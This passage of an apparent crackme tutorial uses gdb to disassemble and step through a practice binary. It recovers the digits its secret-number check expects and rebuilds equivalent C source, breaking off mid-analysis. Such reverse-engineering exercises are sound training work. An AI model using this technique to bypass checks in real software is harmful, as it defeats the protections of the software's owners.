span class="code-line"span class="go" 0x08048669 lt;+29gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804866e lt;+34gt;: lea eax,[esp+0x35]/span/span span class="code-line"span class="go" 0x08048672 lt;+38gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x08048676 lt;+42gt;: mov DWORD PTR [esp],0x8048881/span/span span class="code-line"span class="go" 0x0804867d lt;+49gt;: call 0x80484f0 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048682 lt;+54gt;: mov DWORD PTR [esp+0x28],eax/span/span span class="code-line"span class="go" 0x08048686 lt;+58gt;: cmp DWORD PTR [esp+0x28],0x1/span/span span class="code-line"span class="go" 0x0804868b lt;+63gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go" 0x0804868d lt;+65gt;: movzx eax,BYTE PTR [esp+0x36]/span/span span class="code-line"span class="go" 0x08048692 lt;+70gt;: cmp al,0x39/span/span span class="code-line"span class="go" 0x08048694 lt;+72gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go" 0x08048696 lt;+74gt;: movzx eax,BYTE PTR [esp+0x35]/span/span span class="code-line"span class="go" 0x0804869b lt;+79gt;: cmp al,0x36/span/span span class="code-line"span class="go" 0x0804869d lt;+81gt;: je 0x80486a6 lt;main+90gt;/span/span span class="code-line"span class="go" 0x0804869f lt;+83gt;: call 0x804860d lt;nopegt;/span/span span class="code-line"span class="go" 0x080486a4 lt;+88gt;: jmp 0x80486b3 lt;main+103gt;/span/span span class="code-line"span class="go" 0x080486a6 lt;+90gt;: mov eax,ds:0x804a040/span/span span class="code-line"span class="go" 0x080486ab lt;+95gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486ae lt;+98gt;: call 0x8048480 lt;[email protected];/span/span span class="code-line"span class="go" 0x080486b3 lt;+103gt;: mov DWORD PTR [esp+0x2d],0x0/span/span span class="code-line"span class="go" 0x080486bb lt;+111gt;: mov DWORD PTR [esp+0x31],0x0/span/span span class="code-line"span class="go" 0x080486c3 lt;+119gt;: mov BYTE PTR [esp+0x2d],0x45/span/span span class="code-line"span class="go" 0x080486c8 lt;+124gt;: mov DWORD PTR [esp+0x18],0x1/span/span span class="code-line"span class="go" 0x080486d0 lt;+132gt;: mov DWORD PTR [esp+0x1c],0x2/span/span span class="code-line"span class="go" 0x080486d8 lt;+140gt;: mov DWORD PTR [esp+0x20],0x3/span/span span class="code-line"span class="go" 0x080486e0 lt;+148gt;: mov DWORD PTR [esp+0x24],0x4/span/span span class="code-line"span class="go" 0x080486e8 lt;+156gt;: jmp 0x804875a lt;main+270gt;/span/span span class="code-line"span class="go" 0x080486ea lt;+158gt;: lea edx,[esp+0x35]/span/span span class="code-line"span class="go" 0x080486ee lt;+162gt;: mov eax,DWORD PTR [esp+0x1c]/span/span span class="code-line"span class="go" 0x080486f2 lt;+166gt;: add eax,edx/span/span span class="code-line"span class="go" 0x080486f4 lt;+168gt;: movzx eax,BYTE PTR [eax]/span/span span class="code-line"span class="go" 0x080486f7 lt;+171gt;: mov BYTE PTR [esp+0x15],al/span/span span class="code-line"span class="go" 0x080486fb lt;+175gt;: lea edx,[esp+0x35]/span/span span class="code-line"span class="go" 0x080486ff lt;+179gt;: mov eax,DWORD PTR [esp+0x20]/span/span span class="code-line"span class="go" 0x08048703 lt;+183gt;: add eax,edx/span/span span class="code-line"span class="go" 0x08048705 lt;+185gt;: movzx eax,BYTE PTR [eax]/span/span span class="code-line"span class="go" 0x08048708 lt;+188gt;: mov BYTE PTR [esp+0x16],al/span/span span class="code-line"span class="go" 0x0804870c lt;+192gt;: lea edx,[esp+0x35]/span/span span class="code-line"span class="go" 0x08048710 lt;+196gt;: mov eax,DWORD PTR [esp+0x24]/span/span span class="code-line"span class="go" 0x08048714 lt;+200gt;: add eax,edx/span/span span class="code-line"span class="go" 0x08048716 lt;+202gt;: movzx eax,BYTE PTR [eax]/span/span span class="code-line"span class="go" 0x08048719 lt;+205gt;: mov BYTE PTR [esp+0x17],al/span/span span class="code-line"span class="go" 0x0804871d lt;+209gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x08048721 lt;+213gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048724 lt;+216gt;: call 0x80484d0 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048729 lt;+221gt;: cmp eax,0x7/span/span span class="code-line"span class="go" 0x0804872c lt;+224gt;: ja 0x8048746 lt;main+250gt;/span/span span class="code-line"span class="go" 0x0804872e lt;+226gt;: lea eax,[esp+0x15]/span/span span class="code-line"span class="go" 0x08048732 lt;+230gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048735 lt;+233gt;: call 0x8048500 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804873a lt;+238gt;: lea ecx,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804873e lt;+242gt;: mov edx,DWORD PTR [esp+0x18]/span/span span class="code-line"span class="go" 0x08048742 lt;+246gt;: add edx,ecx/span/span span class="code-line"span class="go" 0x08048744 lt;+248gt;: mov BYTE PTR [edx],al/span/span span class="code-line"span class="go" 0x08048746 lt;+250gt;: add DWORD PTR [esp+0x18],0x1/span/span span class="code-line"span class="go" 0x0804874b lt;+255gt;: add DWORD PTR [esp+0x1c],0x3/span/span span class="code-line"span class="go" 0x08048750 lt;+260gt;: add DWORD PTR [esp+0x20],0x3/span/span span class="code-line"span class="go" 0x08048755 lt;+265gt;: add DWORD PTR [esp+0x24],0x3/span/span span class="code-line"span class="go" 0x0804875a lt;+270gt;: cmp DWORD PTR [esp+0x1c],0x14/span/span span class="code-line"span class="go" 0x0804875f lt;+275gt;: jle 0x80486ea lt;main+158gt;/span/span span class="code-line"span class="go" 0x08048761 lt;+277gt;: mov DWORD PTR [esp+0x4],0x8048886/span/span span class="code-line"span class="go" 0x08048769 lt;+285gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804876d lt;+289gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048770 lt;+292gt;: call 0x8048460 lt;[email protected];/span/span span class="code-line"span class="go"---Type lt;returngt; to continue, or q lt;returngt; to quit---/span/span span class="code-line"span class="go" 0x08048775 lt;+297gt;: test eax,eax/span/span span class="code-line"span class="go" 0x08048777 lt;+299gt;: jne 0x8048794 lt;main+328gt;/span/span span class="code-line"span class="go" 0x08048779 lt;+301gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804877d lt;+305gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x08048781 lt;+309gt;: mov DWORD PTR [esp],0x8048890/span/span span class="code-line"span class="go" 0x08048788 lt;+316gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804878d lt;+321gt;: call 0x8048638 lt;yesgt;/span/span span class="code-line"span class="go" 0x08048792 lt;+326gt;: jmp 0x8048799 lt;main+333gt;/span/span span class="code-line"span class="go" 0x08048794 lt;+328gt;: call 0x804860d lt;nopegt;/span/span span class="code-line"span class="go" 0x08048799 lt;+333gt;: mov eax,0x0/span/span span class="code-line"span class="go" 0x0804879e lt;+338gt;: mov ebx,DWORD PTR [esp+0x4c]/span/span span class="code-line"span class="go" 0x080487a2 lt;+342gt;: xor ebx,DWORD PTR gs:0x14/span/span span class="code-line"span class="go" 0x080487a9 lt;+349gt;: je 0x80487b0 lt;main+356gt;/span/span span class="code-line"span class="go" 0x080487ab lt;+351gt;: call 0x8048490 lt;[email protected];/span/span span class="code-line"span class="go" 0x080487b0 lt;+356gt;: mov ebx,DWORD PTR [ebp-0x4]/span/span span class="code-line"span class="go" 0x080487b3 lt;+359gt;: leave /span/span span class="code-line"span class="go" 0x080487b4 lt;+360gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pFirstly on line 3 I set the disassembly flavor to codeintel/code, this is because I'm more confortable with assembly in intel syntax, it defaults to ATamp;T./p pLooking at the output of codeinfo functions/code its obvious that this application was written in C due to the calls to functions in the C standard library like codestrcmp/code on line 9 and codeprintf/code on line 11. So we can assume that the codemain/code function on line 39 is the start of the application from the programmers point of view so we disassemble that function on line 43./p pFrom the disassembly it looks like +29 (line 54) is where its printing 'Please enter the secret number:' and +49 (line 58) is where its getting my input. There are some cmp's going on at +58 (line 60), +70 (line 63) and +79 (line 66), lets run it in gdb, set a a href="https://en.wikipedia.org/wiki/Breakpoint"breakpoint/a just after the call to scanf (at +49 or line 58) and step through it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048682/span/span span class="code-line"span class="go"Breakpoint 1 at 0x8048682/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /root/crackme/crackmes/crackme1_32bit/span/span span class="code-line"span class="go"Please enter the secret number: 12345678/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 1, 0x08048682 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble $eip,+10/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048682 to 0x804868c:/span/span span class="code-line"span class="go"=gt; 0x08048682 lt;main+54gt;: mov DWORD PTR [esp+0x28],eax/span/span span class="code-line"span class="go" 0x08048686 lt;main+58gt;: cmp DWORD PTR [esp+0x28],0x1/span/span span class="code-line"span class="go" 0x0804868b lt;main+63gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"p $eax/span/span span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span span class="m"1/span/span span class="code-line"/code/pre/div /td/tr/table pSo the EAX a href="https://en.wikipedia.org/wiki/Processor_register"register/a contains the value 1, this value is put into the the memory address pointed to by ESP+0x28 on line 10, which is most likely a pointer variable to a codeint/code or codeunsigned int/code on the stack. This value is then compared to 0x1 (or 1 in decimal) on line 11 and finally if the comparisons are not equal execution jumps to 0x804869f./p p0x804869f is on line 68 (+83) of the disassembly above and all it does is call the codenope/code function. Lets disassemble the codenope/code function and see what it does:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble nope/span/span span class="code-line"span class="go"Dump of assembler code for function nope:/span/span span class="code-line"span class="go" 0x0804860d lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804860e lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x08048610 lt;+3gt;: sub esp,0x18/span/span span class="code-line"span class="go" 0x08048613 lt;+6gt;: mov eax,ds:0x804a040/span/span span class="code-line"span class="go" 0x08048618 lt;+11gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804861b lt;+14gt;: call 0x8048480 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048620 lt;+19gt;: mov DWORD PTR [esp],0x8048850/span/span span class="code-line"span class="go" 0x08048627 lt;+26gt;: call 0x80484a0 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804862c lt;+31gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048633 lt;+38gt;: call 0x80484c0 lt;[email protected];/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x8048850/span/span span class="code-line"span class="go"0x8048850: quot;Nope.quot;/span/span span class="code-line"/code/pre/div /td/tr/table pClearly this would be bad as it seems to be printing the value codeNope./code using the puts command on line 10 and exit's the application with exit code 1 on line 12. Looking at a href="http://linux.die.net/man/3/scanf"man scanf/a, it says: /p blockquote pThese functions return the number of input items successfully matched and assigned, which can be fewer than provided for, or even zero in the event of an early matching failure./p pThe value EOF is returned if the end of input is reached before either the first successful conversion or a matching failure occurs. EOF is also returned if a read error occurs/p /blockquote pLets look at the other comparisons:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 1/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x0804868d/span/span span class="code-line"span class="go"Breakpoint 2 at 0x804868d/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /root/crackmes/crackme1_32bit/span/span span class="code-line"span class="go"Please enter the secret number: 12345678/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 2, 0x0804868d in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+10/span/span span class="code-line"span class="go"Dump of assembler code from 0x804868d to 0x8048697:/span/span span class="code-line"span class="go"=gt; 0x0804868d lt;main+65gt;: movzx eax,BYTE PTR [esp+0x36]/span/span span class="code-line"span class="go" 0x08048692 lt;main+70gt;: cmp al,0x39/span/span span class="code-line"span class="go" 0x08048694 lt;main+72gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go" 0x08048696 lt;main+74gt;: movzx eax,BYTE PTR [esp+0x35]/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xb $esp+0x36/span/span span class="code-line"span class="go"0xbffffc66: 0x32/span/span span class="code-line"/code/pre/div /td/tr/table pThis is comparing 0x32 (or 2 in ascii) with 0x39 (or 9 in ascii), so this going to fail and jump to the nope call. As I only put 1 '2' in my number I guess we can assume that this is the 2nd value in the number, lets replace that and see what happens:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /root/crackmes/crackme1_32bit/span/span span class="code-line"span class="go"Please enter the secret number: 19345678/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 2, 0x0804868d in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x804868d to 0x80486a1:/span/span span class="code-line"span class="go"=gt; 0x0804868d lt;main+65gt;: movzx eax,BYTE PTR [esp+0x36]/span/span span class="code-line"span class="go" 0x08048692 lt;main+70gt;: cmp al,0x39/span/span span class="code-line"span class="go" 0x08048694 lt;main+72gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go" 0x08048696 lt;main+74gt;: movzx eax,BYTE PTR [esp+0x35]/span/span span class="code-line"span class="go" 0x0804869b lt;main+79gt;: cmp al,0x36/span/span span class="code-line"span class="go" 0x0804869d lt;main+81gt;: je 0x80486a6 lt;main+90gt;/span/span span class="code-line"span class="go" 0x0804869f lt;main+83gt;: call 0x804860d lt;nopegt;/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xb $esp+0x36/span/span span class="code-line"span class="go"0xbffffc66: 0x39/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xb $esp+0x35/span/span span class="code-line"span class="go"0xbffffc65: 0x31/span/span span class="code-line"/code/pre/div /td/tr/table pSo we have our 2nd number, but looking at the next comparison, we need 6 as our first number, lets start again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 2/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x0804869d/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /root/crackme/crackmes/crackme1_32bit/span/span span class="code-line"span class="go"Please enter the secret number: 69345678/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 3, 0x0804869d in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x804869d to 0x80486b1:/span/span span class="code-line"span class="go"=gt; 0x0804869d lt;main+81gt;: je 0x80486a6 lt;main+90gt;/span/span span class="code-line"span class="go" 0x0804869f lt;main+83gt;: call 0x804860d lt;nopegt;/span/span span class="code-line"span class="go" 0x080486a4 lt;main+88gt;: jmp 0x80486b3 lt;main+103gt;/span/span span class="code-line"span class="go" 0x080486a6 lt;main+90gt;: mov eax,ds:0x804a040/span/span span class="code-line"span class="go" 0x080486ab lt;main+95gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486ae lt;main+98gt;: call 0x8048480 lt;[email protected];/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x080486a6 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x80486a6 to 0x80486ba:/span/span span class="code-line"span class="go"=gt; 0x080486a6 lt;main+90gt;: mov eax,ds:0x804a040/span/span span class="code-line"span class="go" 0x080486ab lt;main+95gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486ae lt;main+98gt;: call 0x8048480 lt;[email protected];/span/span span class="code-line"span class="go" 0x080486b3 lt;main+103gt;: mov DWORD PTR [esp+0x2d],0x0/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pThat worked, now we have the knowledge to create the first part of the application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"nope/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"puts/spanspan class="p"(/spanspan class="s"quot;Nope.quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"50/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Please enter the secret number: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"scanf/spanspan class="p"(/spanspan class="s"quot;%49squot;/spanspan class="p",/spanspan class="w" /spanspan class="n"input/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="mi"1/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"r/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;9#39;/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;6#39;/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fflush/spanspan class="p"(/spanspan class="n"stdin/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="cm"/* REST OF APPLICATION *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe actual source code might not be exactly the same but this application fragment will give the same result./p pNow lets look at the rest of the code, specifically the calls to strlen, atoi and strcmp:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 3/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048724/span/span span class="code-line"span class="go"Breakpoint 4 at 0x8048724/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048735/span/span span class="code-line"span class="go"Breakpoint 5 at 0x8048735/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048770/span/span span class="code-line"span class="go"Breakpoint 6 at 0x8048770/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 4, 0x08048724 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048724 to 0x8048738:/span/span span class="code-line"span class="go"=gt; 0x08048724 lt;main+216gt;: call 0x80484d0 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048729 lt;main+221gt;: cmp eax,0x7/span/span span class="code-line"span class="go" 0x0804872c lt;main+224gt;: ja 0x8048746 lt;main+250gt;/span/span span class="code-line"span class="go" 0x0804872e lt;main+226gt;: lea eax,[esp+0x15]/span/span span class="code-line"span class="go" 0x08048732 lt;main+230gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048735 lt;main+233gt;: call 0x8048500 lt;[email protected];/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pSo we are at the strlen, looking at the next instruction the result of this is compared with 0x7, lets step inside it and look at the arguments:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x080484d0 in [email protected] ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x08048729 0xbffffc5d 0xbffffc65/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc5d/span/span span class="code-line"span class="go"0xbffffc5d: quot;Equot;/span/span span class="code-line"/code/pre/div /td/tr/table pHmmm... ok, we have an 'E' as the argument, lets continue.../p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 